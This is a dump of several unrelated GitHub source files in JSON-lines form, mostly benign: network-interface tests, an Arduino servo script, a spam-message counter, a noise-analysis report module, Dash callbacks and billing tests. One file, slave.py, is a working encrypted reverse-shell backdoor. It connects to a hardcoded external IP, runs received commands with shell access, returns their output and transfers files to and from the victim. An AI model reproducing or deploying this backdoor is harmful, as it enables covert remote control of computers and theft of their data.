Interface.NAME: \"lo\",\n Interface.TYPE: InterfaceType.LOOPBACK,\n Interface.STATE: InterfaceState.UP,\n }\n ]\n }\n )\n\n\n@pytest.mark.skipif(\n nm_minor_version() < 41,\n reason=(\"Loopback is only supported by NetworkManager 1.41+\"),\n)\nclass TestLoopback:\n def test_change_loopback_mtu_and_restore_back(self, loopback_cleanup):\n cur_state = statelib.show_only((\"lo\",))\n old_mtu = cur_state[Interface.KEY][0][Interface.MTU]\n\n desired_state = {\n Interface.KEY: [\n {\n Interface.NAME: \"lo\",\n Interface.MTU: 12800,\n }\n ]\n }\n libnmstate.apply(desired_state)\n assertlib.assert_state_match(desired_state)\n libnmstate.apply(\n {\n Interface.KEY: [\n {\n Interface.NAME: \"lo\",\n Interface.TYPE: InterfaceType.LOOPBACK,\n Interface.STATE: InterfaceState.ABSENT,\n },\n ]\n },\n )\n state = statelib.show_only((\"lo\",))\n new_mtu = state[Interface.KEY][0][Interface.MTU]\n assert new_mtu == old_mtu\n\n def test_add_more_ip_to_loopback(self, loopback_cleanup):\n desired_state = {\n Interface.KEY: [\n {\n Interface.NAME: \"lo\",\n Interface.TYPE: InterfaceType.LOOPBACK,\n Interface.STATE: InterfaceState.UP,\n Interface.IPV4: {\n InterfaceIPv4.ENABLED: True,\n InterfaceIPv4.ADDRESS: [\n {\n InterfaceIPv4.ADDRESS_IP: IPV4_ADDRESS1,\n InterfaceIPv4.ADDRESS_PREFIX_LENGTH: 24,\n }\n ],\n },\n Interface.IPV6: {\n InterfaceIPv6.ENABLED: True,\n InterfaceIPv6.ADDRESS: [\n {\n InterfaceIPv6.ADDRESS_IP: IPV6_ADDRESS1,\n InterfaceIPv6.ADDRESS_PREFIX_LENGTH: 64,\n }\n ],\n },\n }\n ]\n }\n libnmstate.apply(desired_state)\n desired_state[Interface.KEY][0][Interface.IPV4][\n InterfaceIPv4.ADDRESS\n ].append(\n {\n InterfaceIPv4.ADDRESS_IP: \"127.0.0.1\",\n InterfaceIPv4.ADDRESS_PREFIX_LENGTH: 8,\n }\n )\n desired_state[Interface.KEY][0][Interface.IPV6][\n InterfaceIPv6.ADDRESS\n ].append(\n {\n InterfaceIPv4.ADDRESS_IP: \"::1\",\n InterfaceIPv4.ADDRESS_PREFIX_LENGTH: 128,\n }\n )\n assertlib.assert_state_match(desired_state)\n","repo_name":"nmstate/nmstate","sub_path":"tests/integration/loopback_test.py","file_name":"loopback_test.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","stars":225,"dataset":"github-code","pt":"3"} +{"seq_id":"19117951692","text":"from pyfirmata import Arduino, SERVO , boards,util,STRING_DATA\n#import serial\n\n#ser = serial.Serial(\"COM3\",9600)\nport='COM3'\n#Now using 2 servo motors\n#pin=10\n\nboard=Arduino(port)\n\nboard.digital[9].mode=SERVO\nboard.digital[6].mode=SERVO\n\n\ndef rotateServo(pin,angle):\n board.digital[9].write(angle)\n board.digital[6].write(angle)\n \ndef doorAutomate(val):\n if val == 1:\n rotateServo(9,90)\n rotateServo(6,90)\n \n elif val == 0:\n rotateServo(9,90)\n rotateServo(6,180)\n \n \n","repo_name":"aaheli8/FaceMask-Detection-Automated-Door","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"721641568","text":"ham_count = 0\r\nham_words = 0\r\nspam_count = 0\r\nspam_words = 0\r\nexclamation_count = 0\r\n\r\nwith open('SMSSpamCollection.txt') as file:\r\n for line in file:\r\n line = line.rstrip()\r\n words = line.strip().split()\r\n if words[0] == 'ham':\r\n ham_count += 1\r\n ham_words += len(words) - 1\r\n else:\r\n spam_count += 1\r\n spam_words += len(words) - 1\r\n if line.endswith(\"!\"):\r\n exclamation_count += 1\r\n\r\n\r\nprint(f\"Prosječan broj riječi u porukama koje su tipa ham: {ham_words/ham_count}\")\r\nprint(f\"Prosječan broj riječi u porukama koje su tipa spam: {spam_words/spam_count}\")\r\nprint(f\"Od {spam_count} SMS poruka koje su tipa spam, {exclamation_count} završava uskličnikom.\")\r\n","repo_name":"JanjaTomic/OSU_LV","sub_path":"LV1/zadatak5.py","file_name":"zadatak5.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39617561990","text":"import itertools\nimport openpyxl\nimport shapefile\n\n\nclass Analysis(object):\n pass\n\nclass Report(object):\n \"\"\" Reports receiver results based on shapefile of known schema\n \"\"\" \n\n def __init__(self, receivers, common_noise_environment=None):\n self.shp = receivers\n self.common_noise_env = common_noise_environment\n self.SENSITIVE_QUERY = ('A', 'B', 'C', 'D', 'E') \n\n def _get_field_index(self, fields):\n flds = [fld for fld in fields if fld[0] != 'DeletionFlag'] # removed hidden field for proper indexing\n field_map = {}\n for index, field in enumerate(flds):\n field_name = field[0]\n field_map[field_name] = index \n return field_map\n\n def _field_map(self):\n return self._get_field_index(shapefile.Reader(self.shp).fields)\n\n def all_receivers(self):\n with shapefile.Reader(self.shp) as sreader:\n if self.common_noise_env:\n cne = self._field_map()['assoc_bar'] \n return [record for record in sreader.records() if record[cne] == self.common_noise_env]\n else: \n return [record for record in sreader.records()]\n\n def nac_b_receivers(self):\n nac_cat = self._field_map()['nac_cat'] \n return [record for record in self.all_receivers() if record[nac_cat] == 'B']\n\n def nac_c_receivers(self):\n nac_cat = self._field_map()['nac_cat'] \n return [record for record in self.all_receivers() if record[nac_cat] == 'C']\n\n def nac_d_receivers(self):\n nac_cat = self._field_map()['nac_cat'] \n return [record for record in self.all_receivers() if record[nac_cat] == 'D']\n\n def nac_e_receivers(self):\n nac_cat = self._field_map()['nac_cat'] \n return [record for record in self.all_receivers() if record[nac_cat] == 'E']\n\n def nac_b_receptors_total(self):\n du = self._field_map()['du']\n nac_cat = self._field_map()['nac_cat'] \n return sum([row[du] for row in self.all_receivers() if row[nac_cat] == 'B'])\n\n def nac_c_receptors_total(self):\n du = self._field_map()['du']\n nac_cat = self._field_map()['nac_cat'] \n return sum([row[du] for row in self.all_receivers() if row[nac_cat] == 'C'])\n\n def nac_d_receptors_total(self):\n du = self._field_map()['du']\n nac_cat = self._field_map()['nac_cat'] \n return sum([row[du] for row in self.all_receivers() if row[nac_cat] == 'D'])\n\n def nac_e_receptors_total(self):\n du = self._field_map()['du']\n nac_cat = self._field_map()['nac_cat'] \n return sum([row[du] for row in self.all_receivers() if row[nac_cat] == 'E'])\n\n def sensitive_receivers(self):\n nac_cat = self._field_map()['nac_cat'] \n return [record for record in self.all_receivers() if record[nac_cat] in self.SENSITIVE_QUERY]\n\n def sensitive_receptors_total(self):\n du = self._field_map()['du']\n nac_cat = self._field_map()['nac_cat'] \n return sum([row[du] for row in self.all_receivers() if row[nac_cat] in self.SENSITIVE_QUERY])\n\n def benefited_receptors(self):\n du = self._field_map()['du']\n bar_reduct = self._field_map()['bar_reduct']\n return sum([record[du] for record in self.sensitive_receivers() if record[bar_reduct] >= 5])\n\n def receptors_total(self):\n du = self._field_map()['du']\n return sum([row[du] for row in self.all_receivers()])\n\n def impacted_receivers(self):\n impacts = list(\n itertools.chain(\n self.build_b_nac_impacts(),\n self.build_c_nac_impacts(),\n self.build_d_nac_impacts(),\n self.build_e_nac_impacts(),\n self.build_b_substantial_impacts(),\n self.build_c_substantial_impacts(),\n self.build_d_substantial_impacts(),\n self.build_e_substantial_impacts()\n )\n ) \n return impacts\n\n def impacted_total(self):\n du = self._field_map()['du']\n return sum([impact[du] for impact in self.impacted_receivers()])\n\n def build_b_impacted_total(self):\n nac_cat = self._field_map()['nac_cat']\n du = self._field_map()['du']\n return sum([impact[du] for impact in self.impacted_receivers() if impact[nac_cat] == 'B'])\n\n def build_c_impacted_total(self):\n nac_cat = self._field_map()['nac_cat']\n du = self._field_map()['du']\n return sum([impact[du] for impact in self.impacted_receivers() if impact[nac_cat] == 'C'])\n\n def build_d_impacted_total(self):\n nac_cat = self._field_map()['nac_cat']\n du = self._field_map()['du']\n return sum([impact[du] for impact in self.impacted_receivers() if impact[nac_cat] == 'D'])\n\n def build_e_impacted_total(self):\n nac_cat = self._field_map()['nac_cat']\n du = self._field_map()['du']\n return sum([impact[du] for impact in self.impacted_receivers() if impact[nac_cat] == 'E'])\n\n def build_b_nac_impacts(self): \n nac_cat = self._field_map()['nac_cat']\n bld_snd = self._field_map()['bld_snd']\n return [row for row in self.sensitive_receivers() if (row[nac_cat] == 'B' and row[bld_snd] >= 66)]\n\n def build_c_nac_impacts(self): \n nac_cat = self._field_map()['nac_cat']\n bld_snd = self._field_map()['bld_snd']\n return [row for row in self.sensitive_receivers() if (row[nac_cat] == 'C' and row[bld_snd] >= 66)]\n\n def build_d_nac_impacts(self): \n nac_cat = self._field_map()['nac_cat']\n bld_snd = self._field_map()['bld_snd']\n return [row for row in self.sensitive_receivers() if (row[nac_cat] == 'D' and row[bld_snd] >= 51)]\n\n def build_e_nac_impacts(self): \n nac_cat = self._field_map()['nac_cat']\n bld_snd = self._field_map()['bld_snd']\n return [row for row in self.sensitive_receivers() if (row[nac_cat] == 'E' and row[bld_snd] >= 71)]\n\n def build_b_substantial_impacts(self): \n nac_cat = self._field_map()['nac_cat']\n bld_snd = self._field_map()['bld_snd']\n ex_snd = self._field_map()['ex_snd']\n return [row for row in self.sensitive_receivers() if (row[nac_cat] == 'B' and (row[bld_snd] - row[ex_snd] >= 15))]\n\n def build_c_substantial_impacts(self): \n nac_cat = self._field_map()['nac_cat']\n bld_snd = self._field_map()['bld_snd']\n ex_snd = self._field_map()['ex_snd']\n return [row for row in self.sensitive_receivers() if (row[nac_cat] == 'C' and (row[bld_snd] - row[ex_snd] >= 15))]\n\n def build_d_substantial_impacts(self): \n nac_cat = self._field_map()['nac_cat']\n bld_snd = self._field_map()['bld_snd']\n ex_snd = self._field_map()['ex_snd']\n return [row for row in self.sensitive_receivers() if (row[nac_cat] == 'D' and (row[bld_snd] - row[ex_snd] >= 15))]\n\n def build_e_substantial_impacts(self): \n nac_cat = self._field_map()['nac_cat']\n bld_snd = self._field_map()['bld_snd']\n ex_snd = self._field_map()['ex_snd']\n return [row for row in self.sensitive_receivers() if (row[nac_cat] == 'E' and (row[bld_snd] - row[ex_snd] >= 15))]\n\n def existing_minimum(self):\n ex_snd = self._field_map()['ex_snd']\n return min([row[ex_snd] for row in self.sensitive_receivers()])\n\n def existing_maximum(self):\n ex_snd = self._field_map()['ex_snd']\n return max([row[ex_snd] for row in self.sensitive_receivers()])\n\n def nobld_minimum(self):\n nobld_snd = self._field_map()['nobld_snd']\n return min([row[nobld_snd] for row in self.sensitive_receivers()])\n\n def nobld_maximum(self):\n nobld_snd = self._field_map()['nobld_snd']\n return max([row[nobld_snd] for row in self.sensitive_receivers()])\n\n def bld_minimum(self):\n bld_snd = self._field_map()['bld_snd']\n return min([row[bld_snd] for row in self.sensitive_receivers()])\n\n def bld_maximum(self):\n bld_snd = self._field_map()['bld_snd']\n return max([row[bld_snd] for row in self.sensitive_receivers()])\n \n def bld_average_change(self):\n ex_snd = self._field_map()['ex_snd']\n bld_snd = self._field_map()['bld_snd']\n diff_list = [row[bld_snd] - row[ex_snd] for row in self.sensitive_receivers()]\n return round(sum(diff_list) / len(diff_list), 1)\n\n def nobld_average_change(self):\n ex_snd = self._field_map()['ex_snd']\n nobld_snd = self._field_map()['nobld_snd']\n diff_list = [row[nobld_snd] - row[ex_snd] for row in self.sensitive_receivers()]\n return round(sum(diff_list) / len(diff_list), 1)\n\n def summary(self):\n narrative = f\"A total of {self.sensitive_receptors_total()} noise sensitive receptors were analyzed. \"\n narrative += f\"Existing noise levels range from {self.existing_minimum()} to {self.existing_maximum()} dB(A) at {self.sensitive_receptors_total()} receptors. \"\n narrative += f\"No Build noise levels would range from {self.nobld_minimum()} to {self.nobld_maximum()} dB(A). \"\n narrative += f\"Build noise levels would range from {self.bld_minimum()} to {self.bld_maximum()} dB(A). \" \n narrative += f\"Noise is predicted to change by an average of {self.nobld_average_change()} dB(A) under the No Build Alternative. \"\n narrative += f\"Noise is predicted to change by an average of {self.bld_average_change()} dB(A) under the Build Alternative. \"\n if self.impacted_total() == 0:\n narrative += f\"No receptors would be impacted under the Build Alternative.\"\n else:\n narrative += f\"A total of {self.impacted_total()} receptors would be impacted under the Build Alternative; therefore, noise abatement was considered.\"\n return narrative\n\n\ndef create_florida_barrier_summary(xlsx, bar_length, cost_per_sq_ft):\n \"\"\" Generate Florida barrier summary based on Sound Results table for *each* barrier\n analysis in TNM Run. \n \n Arguments:\n xlsx {String} -- Path to xlsx\n \"\"\"\n xlsx = openpyxl.load_workbook(xlsx)\n barrier_summaries = xlsx.worksheets\n empty_row = [None] * 14 # empty cells, TNM standard output\n increments = [8, 10, 12, 14, 16, 18, 20, 22] #feet\n barrier_summary = []\n for idx, bar_hgt in enumerate(increments):\n table_rows = [row for row in barrier_summaries[idx].rows][19:]\n results = []\n for row in table_rows:\n cells = [cell.value for cell in row]\n if cells != empty_row:\n results.append(cells)\n else:\n break\n impacted_receptors = [row for row in results if row[9] != ' ----']\n impacted_receptors_count = sum([row[3] for row in impacted_receptors])\n min_benefit = sum([row[3] for row in impacted_receptors if 5 <= row[11] <= 5.9])\n mid_benefit = sum([row[3] for row in impacted_receptors if 6 <= row[11] <= 6.9])\n max_benefit = sum([row[3] for row in impacted_receptors if 7 <= row[11]])\n benefited_receptors = [row for row in results if row[11] >= 5]\n benefited_receptor_count = sum([row[3] for row in benefited_receptors])\n impacted_benefited_receptor_count = sum([row[3] for row in impacted_receptors if row[11] >= 5])\n impacted_not_benefited_receptor_count = benefited_receptor_count - impacted_benefited_receptor_count\n estimated_cost = round(bar_length * bar_hgt * cost_per_sq_ft)\n try:\n average_benefit_reduction = round(sum([row[11] for row in benefited_receptors]) / len(benefited_receptors), 1)\n cost_per_benefit = round(estimated_cost / benefited_receptor_count)\n except ZeroDivisionError:\n average_benefit_reduction = 0 \n cost_per_benefit = 0\n barrier_summary.append((\n bar_hgt, '{:,.0f}'.format(bar_length), impacted_receptors_count, min_benefit, mid_benefit, max_benefit, \n impacted_benefited_receptor_count, impacted_not_benefited_receptor_count, benefited_receptor_count, \n average_benefit_reduction, estimated_cost, cost_per_benefit))\n return barrier_summary\n\ndef summarize_cne(receivers, cne):\n r = Report(receivers, cne) \n return (\n cne, \n 'LOCATION', \n r.nac_b_receptors_total(), \n r.nac_c_receptors_total(),\n r.nac_e_receptors_total(),\n r.existing_minimum(),\n r.existing_maximum(),\n r.nobld_minimum(),\n r.nobld_maximum(),\n r.bld_minimum(),\n r.bld_maximum(),\n r.build_b_impacted_total(),\n r.build_c_impacted_total(),\n r.build_e_impacted_total(),\n 'WARRANTED'\n )\n\ndef create_cne_summary_table(receivers, cne_list, xlsx):\n wb = openpyxl.Workbook()\n ws = wb.active\n hdrs = ('CNE', 'Location', 'NAC B', 'NAC C', 'NAC E', 'Min', 'Max', 'Min', 'Max', 'Min', 'Max', 'NAC B', 'NAC C', 'NAC E', 'Abatement Warranted')\n ws.append(hdrs)\n for cne in cne_list:\n cne_summary = summarize_cne(receivers, cne)\n ws.append(cne_summary) \n wb.save(filename=xlsx)\n\ndef create_barrier_summary_table(barrier_summary, xlsx):\n \"\"\"Generate .xlsx file of barrier results\n \n Arguments:\n barrier_summary {}\n xlsx {String} -- Full output path\n \"\"\"\n wb = openpyxl.Workbook()\n ws = wb.active\n hdrs = (\"Barrier Height\", \"Barrier Length\", \"Impacted Receptors\", \n \"5 - 5.9 dB(A)\", \"6 - 6.9 dB(A)\", \"7+\", \"Impacted\", \"Not Impacted\", \n \"Total\", \"Average Benefited Reduction\", \"Estimated Cost\", \"Cost per Benefit\", \"Feasible and Reasonable\")\n ws.append(hdrs)\n for barrier_design in barrier_summary:\n ws.append(barrier_design)\n wb.save(filename=xlsx)","repo_name":"fstraw/pytnm","sub_path":"pytnm/utils/report/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":13942,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"39805964373","text":"from datetime import datetime as dt\n\nimport pandas_datareader as pdr\nfrom dash.dependencies import Input\nfrom dash.dependencies import Output\nfrom app.dashapp1.data.data import Data\nimport dash_table as dtb\nimport plotly.graph_objs as go\n\n\n\ndef register_callbacks(dashapp):\n\n\n @dashapp.callback(Output('my-graph-2', 'figure'), [Input('selectYearStart', 'value'), Input('selectYearEnd', 'value')])\n def update_graph_2(selectYearStart, selectYearEnd):\n d = Data()\n df = d.get_raw(selectYearStart, selectYearEnd)\n\n return {\n 'data': [{\n 'x': df.lastsolddate,\n 'y': df.lastsoldprice,\n 'type':'bar'\n }],\n 'layout': {'margin': {'l': 0, 'r': 100, 't': 0, 'b': 100}}\n }\n\n @dashapp.callback(\n [\n Output('table-raw', 'columns'),\n Output('table-raw', 'data')\n ],\n [\n Input('table-raw' , \"page_current\"),\n Input('table-raw' , \"page_size\"),\n Input('table-raw' , 'sort_by'),\n Input('selectYearStart', 'value'),\n Input('selectYearEnd' , 'value')\n ])\n\n def update_raw(page_current, page_size, sort_by, selectYearStart, selectYearEnd):\n d = Data()\n df = d.get_raw(selectYearStart, selectYearEnd)\n \n if len(sort_by):\n dfs = df.sort_values(\n sort_by[0]['column_id'],\n ascending=sort_by[0]['direction'] == 'asc',\n inplace=False\n )\n else: # No sort \n dfs = df\n\n columns = [{'name': i, 'id': i, 'deletable': True} for i in sorted(dfs.columns) ]\n\n data = dfs.iloc[page_current*page_size:(page_current+ 1)*page_size].to_dict('records')\n\n return columns, data\n\n\n @dashapp.callback(\n [\n Output('table-stats', 'columns'),\n Output('table-stats', 'data')\n ],\n [\n Input('selectYearStart', 'value')\n ])\n\n def update_stats(selection=None):\n\n d = Data()\n df = d.get_raw()\n \n df_stats = d.get_stats(df)\n \n columns = [{'name': i, 'id': i, 'deletable': True} for i in df_stats.columns ]\n\n data = df_stats.to_dict('records')\n \n\n return columns, data\n\n\n @dashapp.callback(\n \n Output('scatter-map', 'figure')\n ,\n [\n Input('selectYearStart', 'value'),\n Input('selectYearEnd' , 'value')\n ])\n\n def update_scatter_map( selectYearStart, selectYearEnd):\n d = Data()\n df = d.get_raw(selectYearStart, selectYearEnd)[['latitude', 'longitude']]\n \n #columns = [{'name': i, 'id': i, 'deletable': True} for i in sorted(df.columns) ]\n\n trace = go.Scatter(y = df['latitude'], x = df['longitude'],\n name = 'Location',\n mode='markers')\n layout = go.Layout(title = '',\n hovermode = 'closest')\n figure = go.Figure(data = [trace], layout=layout)\n\n return figure\n\n\n","repo_name":"renenadorp/medium-ml","sub_path":"app/dashapp1/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"25482330221","text":"#!/usr/bin/python\n\nfrom Crypto.Cipher import AES\nimport subprocess,socket\nimport base64\nimport time\nimport os\n\n# the block size for the cipher object; must be 16 per FIPS-197\nBLOCK_SIZE = 32\n\n# the character used for padding--with a block cipher such as AES, the value\n# you encrypt must be a multiple of BLOCK_SIZE in length. This character is\n# used to ensure that your value is always a multiple of BLOCK_SIZE\nPADDING = '{'\n\n# one-liner to sufficiently pad the text to be encrypted\npad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING\n\n# one-liners to encrypt/encode and decrypt/decode a string\n# encrypt with AES, encode with base64\nEncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))\nDecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)\n\n# generate a random secret key\nsecret = \"dz7xf9t6PaC7wN+dPv+QrxHBJ2eGuLAq\"\n\n# create a cipher object using the random secret\ncipher = AES.new(secret)\n\nHOST = '159.203.35.5'\nPORT = 666\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((HOST, PORT))\nactive = False\n\n# main loop\nwhile True:\n data = s.recv(1024)\n decrypted = DecodeAES(cipher, data)\n\n time.sleep(0.8)\n success = EncodeAES(cipher, 'Success! We made it!EOFEOFEOFEOFEOFX')\n s.send(success)\n active = True\n\n # active\n while active:\n # this data is now encrypted\n data = s.recv(1024)\n\n # decrypt data\n decrypted = DecodeAES(cipher, data)\n\n # check for quit\n if decrypted.startswith(\"quit\") == True:\n sendData = 'Exit. \\n EOFEOFEOFEOFEOFX'\n crptData = EncodeAES(cipher, sendData)\n s.send(crptData)\n active = False\n\n # check for download\n elif decrypted.startswith(\"downoad\") == True:\n\n # set file name\n sendFile = decrypted[9:]\n\n # file transfer\n f = open(sendFile, 'rb')\n while 1:\n fileData = f.read()\n if fileData == '': break\n # begin sending fileData\n s.sendall(fileData)\n f.close\n time.sleep(0.8)\n\n # l3t server know we are done\n s.sendall('EOFEOFEOFEOFEOFX')\n time.sleep(0.8)\n s.sendall(EncodeAES(cipher, 'Finished download.EOFEOFEOFEOFEOFX'))\n\n elif decrypted.startswith(\"upload\") == True:\n\n # set the file name\n downFile = decrypted[7:]\n\n # file transfer\n g = open(downFile, 'wb')\n\n # download file\n while True:\n l = s.recv(1024)\n while (l):\n if l.endswith('EOFEOFEOFEOFEOFX'):\n u = l[:-16]\n g.write(u)\n break\n else:\n g.write(l)\n l = s.recv(1024)\n break\n g.close()\n time.sleep(0.8)\n\n # let server know we are done\n s.sendall(EncodeAES(cipher, 'Finished upload. EOFEOFEOFEOFEOFX'))\n\n else:\n # execute command\n proc = subprocess.Popen(decrypted, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n\n # save output error.\n stdoutput = proc.stdout.read() + proc.stderr.read() + \"EOFEOFEOFEOFEOFX\"\n\n # encrypt output\n encrypted = EncodeAES(cipher, stdoutput)\n\n # send encrypted output\n s.send(encrypted)\n\n\n data = s.recv(1024)\n decrypted = DecodeAES(cipher, data)\n if decrypted == \"quit\":\n break\n elif decrypted.startswith(\"download\") == True:\n\n sendFile = decrypted[9:]\n with open(sendFile, 'rb' ) as f:\n while l:\n fileData = f.read()\n if fileData == \".\": break\n s.sendall(fileData)\n f.close()\n time.sleep(0.8)\n\n s.sendall(\"EOFEOFEOFEOFEOFX\")\n time.sleep(0.8)\n s.sendall(EncodeAES(cipher, \"Finished download. EOFEOFEOFEOFEOFX\"))\n\n else:\n proc = subprocess.Popen(decrypted, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n stdoutput = proc.stdout.read() + proc.stderr.read()\n encrypted = EncodeAES(cipher, stdoutput)\n s.send(encrypted)\n\n# loop ends here#\ns.send('Bye now!')\ns.close()\n","repo_name":"crazywolf132/lol","sub_path":"slave.py","file_name":"slave.py","file_ext":"py","file_size_in_byte":4379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29047543317","text":"# -*- coding: utf-8 -*-\n\nimport datetime\n\nimport pytest\nimport mock\n\nfrom balance import mapper\nimport balance.actions.acts as a_a\nfrom balance import default_bank_rules\nfrom balance.constants import (\n FirmId,\n PaymentMethodIDs,\n DIRECT_PRODUCT_ID,\n DIRECT_PRODUCT_RUB_ID,\n)\n\nfrom tests import object_builder as ob\n\n\ndef create_firm(session):\n return ob.FirmBuilder(region_id=225).build(session).obj\n\n\ndef create_paysys(session, firm, category, currency='RUR', payment_method_id=PaymentMethodIDs.credit_card):\n return ob.PaysysBuilder(\n firm=firm,\n category=category,\n currency=currency,\n iso_currency=mapper.Currency.fix_iso_code(currency),\n payment_method_id=payment_method_id\n ).build(session).obj\n\n\ndef create_bank(session):\n return ob.PaymentBankBuilder().build(session).obj\n\n\ndef create_bank_details(session, firm, bank=None, currency='RUR'):\n return ob.BankDetailsBuilder(\n payment_bank=bank or create_bank(session),\n firm=firm,\n currency=currency,\n iso_currency=mapper.Currency.fix_iso_code(currency)\n ).build(session).obj\n\n\ndef create_invoice(session, client, person_type, firm_id=FirmId.YANDEX_OOO):\n person = ob.PersonBuilder(client=client, type=person_type).build(session).obj\n paysys = (\n session.query(mapper.Paysys)\n .filter_by(firm_id=firm_id,\n category=person_type,\n payment_method_id=PaymentMethodIDs.credit_card,\n currency='RUR'\n )\n .first()\n )\n product = ob.Getter(mapper.Product, DIRECT_PRODUCT_RUB_ID)\n order = ob.OrderBuilder(product=product, client=client)\n request = ob.RequestBuilder(\n firm_id=firm_id,\n basket=ob.BasketBuilder(\n client=client,\n rows=[ob.BasketItemBuilder(quantity=1, order=order)]\n )\n )\n invoice = ob.InvoiceBuilder(\n client=client,\n person=person,\n paysys=paysys,\n request=request,\n ).build(session).obj\n session.expire_all()\n return invoice\n\n\ndef create_client_bank(session, client, bank, firm, person_category='ur'):\n return ob.ClientBankBuilder(\n client=client,\n person_category=person_category,\n payment_bank=bank,\n firm=firm,\n ).build(session).obj\n\n\n@pytest.fixture\ndef rules():\n old_rules = default_bank_rules.PARSER.rules\n new_rules = []\n\n default_bank_rules.PARSER.rules = new_rules\n yield new_rules\n default_bank_rules.PARSER.rules = old_rules\n\n\n@pytest.fixture\ndef firm(session):\n return create_firm(session)\n\n\n@pytest.fixture\ndef paysys_ph(session, firm):\n return create_paysys(session, firm, 'ph')\n\n\n@pytest.fixture\ndef paysys_ur(session, firm):\n return create_paysys(session, firm, 'ur')\n\n\n@pytest.fixture\ndef client(session):\n return ob.ClientBuilder().build(session).obj\n\n\n@pytest.fixture\ndef client_aliases(session, client):\n res = []\n for idx in range(3):\n res.append(ob.ClientBuilder.construct(session))\n res[-1].make_equivalent(client)\n return res\n\n\ndef test_no_bank_details(session, client, firm, paysys_ur):\n i = create_invoice(session, client, 'ur', firm.id)\n assert i.bank_id is None\n assert i.bank_details_id is None\n assert not client.banks\n\n\ndef test_no_rules_single_bank(session, client, firm, paysys_ur):\n bd = create_bank_details(session, firm)\n create_bank_details(session, firm, currency='USD')\n create_bank_details(session, create_firm(session))\n i = create_invoice(session, client, 'ur', firm.id)\n\n assert i.bank_details_id == bd.id\n client_bank, = client.banks\n assert client_bank.bank_id == bd.bank_id\n assert client_bank.firm_id == firm.id\n assert client_bank.person_category == 'ur'\n\n\ndef test_no_rules_multiple_banks(session, client, firm, paysys_ur):\n create_bank_details(session, firm)\n bd = create_bank_details(session, firm)\n\n with mock.patch('balance.mapper.invoices.random.choice', return_value=bd.bank_id):\n i = create_invoice(session, client, 'ur', firm.id)\n\n assert i.bank_details_id == bd.id\n client_bank, = client.banks\n assert client_bank.bank_id == bd.bank_id\n assert client_bank.firm_id == firm.id\n assert client_bank.person_category == 'ur'\n\n\ndef test_rules_single_allowed(session, client, rules, firm, paysys_ur):\n create_bank_details(session, firm)\n bd = create_bank_details(session, firm)\n rules.append({'firm_id': [firm.id], 'bank_ids': {bd.bank_id: None}})\n\n i = create_invoice(session, client, 'ur', firm.id)\n\n assert i.bank_details_id == bd.id\n client_bank, = client.banks\n assert client_bank.bank_id == bd.bank_id\n assert client_bank.firm_id == firm.id\n assert client_bank.person_category == 'ur'\n\n\ndef test_rules_multiple_allowed(session, client, rules, firm, paysys_ur):\n bd1 = create_bank_details(session, firm)\n bd2 = create_bank_details(session, firm)\n bd3 = create_bank_details(session, firm)\n rules.append({'firm_id': [firm.id], 'bank_ids': {bd1.bank_id: None, bd2.bank_id: None, bd3.bank_id: None}})\n\n with mock.patch('balance.mapper.invoices.random.choice', return_value=bd1.bank_id):\n i = create_invoice(session, client, 'ur', firm.id)\n\n assert i.bank_details_id == bd1.id\n client_bank, = client.banks\n assert client_bank.bank_id == bd1.bank_id\n assert client_bank.firm_id == firm.id\n assert client_bank.person_category == 'ur'\n\n\ndef test_rules_multiple_allowed_weighted(session, client, rules, firm, paysys_ur):\n bd1 = create_bank_details(session, firm)\n bd2 = create_bank_details(session, firm)\n bd3 = create_bank_details(session, firm)\n rules.append({'firm_id': [firm.id], 'bank_ids': {bd1.bank_id: 6, bd2.bank_id: 66, bd3.bank_id: 666}})\n\n with mock.patch('balance.muzzle_util.weighted_choice', return_value=bd1.bank_id):\n i = create_invoice(session, client, 'ur', firm.id)\n\n assert i.bank_details_id == bd1.id\n client_bank, = client.banks\n assert client_bank.bank_id == bd1.bank_id\n assert client_bank.firm_id == firm.id\n assert client_bank.person_category == 'ur'\n\n\ndef test_cache_matching_no_rules(session, client, firm, paysys_ur):\n create_bank_details(session, firm)\n bd = create_bank_details(session, firm)\n\n client_bank = create_client_bank(session, client, bd.payment_bank, firm)\n\n i = create_invoice(session, client, 'ur', firm.id)\n\n assert i.bank_details_id == bd.id\n assert client.banks == [client_bank]\n\n\ndef test_cache_matching_rules(session, client, rules, firm, paysys_ur):\n bd = create_bank_details(session, firm)\n bd_alt = create_bank_details(session, firm)\n create_bank_details(session, firm)\n\n client_bank = create_client_bank(session, client, bd.payment_bank, firm)\n rules.append({'firm_id': [firm.id], 'bank_ids': {bd.bank_id: None, bd_alt.bank_id: None}})\n\n i = create_invoice(session, client, 'ur', firm.id)\n\n assert i.bank_details_id == bd.id\n assert client.banks == [client_bank]\n\n\ndef test_cache_unmatching_no_rules(session, client, firm, paysys_ur):\n bd = create_bank_details(session, firm)\n alt_bank = create_bank(session)\n\n client_bank = create_client_bank(session, client, alt_bank, firm)\n\n i = create_invoice(session, client, 'ur', firm.id)\n\n assert i.bank_details_id == bd.id\n assert client.banks == [client_bank]\n assert client_bank.bank_id == bd.bank_id\n\n\ndef test_cache_unmatching_rules(session, client, rules, firm, paysys_ur):\n bd = create_bank_details(session, firm)\n bd_alt = create_bank_details(session, firm)\n\n client_bank = create_client_bank(session, client, bd_alt.payment_bank, firm)\n rules.append({'firm_id': [firm.id], 